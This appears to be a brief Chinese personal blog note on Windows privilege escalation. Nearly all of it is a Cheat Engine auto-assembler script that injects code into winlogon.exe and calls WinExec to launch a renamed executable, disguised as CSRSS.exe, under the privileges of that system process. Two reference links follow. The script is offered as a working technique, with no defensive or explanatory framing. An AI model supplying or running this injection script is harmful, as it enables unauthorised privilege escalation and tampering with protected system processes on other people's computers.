可乐博客

windows提权

winlogon.exe
KERNEL32.WinExec

[ENABLE]
GlobalAlloc(lengfeng,800)
label(xxx)


lengfeng:
push rdi
sub rsp,20
mov edx,5
mov rcx,xxx
call KERNEL32.WinExec
add Rsp,20
pop rdi
ret




xxx://cheatengine-x86_64.exe 备份改名后的文件
db 'C:\Kele\0.7LKele\360safe\Crack\ce6.1\CSRSS.exe',0


createthread(lengfeng)
[DISABLE]
dealloc(lengfeng)


https://www.freebuf.com/articles/system/184289.html
https://tieba.baidu.com/p/6693704985?red_tag=0075834493

随笔